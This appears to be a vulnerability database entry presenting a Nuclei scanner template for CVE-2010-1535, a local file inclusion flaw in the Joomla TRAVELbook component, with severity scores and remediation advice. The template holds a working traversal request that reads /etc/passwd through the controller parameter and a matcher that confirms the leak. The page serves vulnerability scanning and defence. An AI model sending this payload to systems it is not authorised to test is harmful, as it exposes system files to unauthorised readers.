Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1535
HistoryAug 23, 2021 - 11:04 p.m.

Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

2021-08-2323:04:17
ProjectDiscovery
github.com
3

7.1 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.007 Low

EPSS

Percentile

80.2%

A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1535

info:
  name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12151
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1535
    - http://www.exploit-db.com/exploits/12151
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1535
    cwe-id: CWE-22
    epss-score: 0.00706
    epss-percentile: 0.78254
    cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: peter_hocherl
    product: com_travelbook
  tags: cve,cve2010,joomla,lfi,edb,peter_hocherl

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950

7.1 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.007 Low

EPSS

Percentile

80.2%

Related for NUCLEI:CVE-2010-1535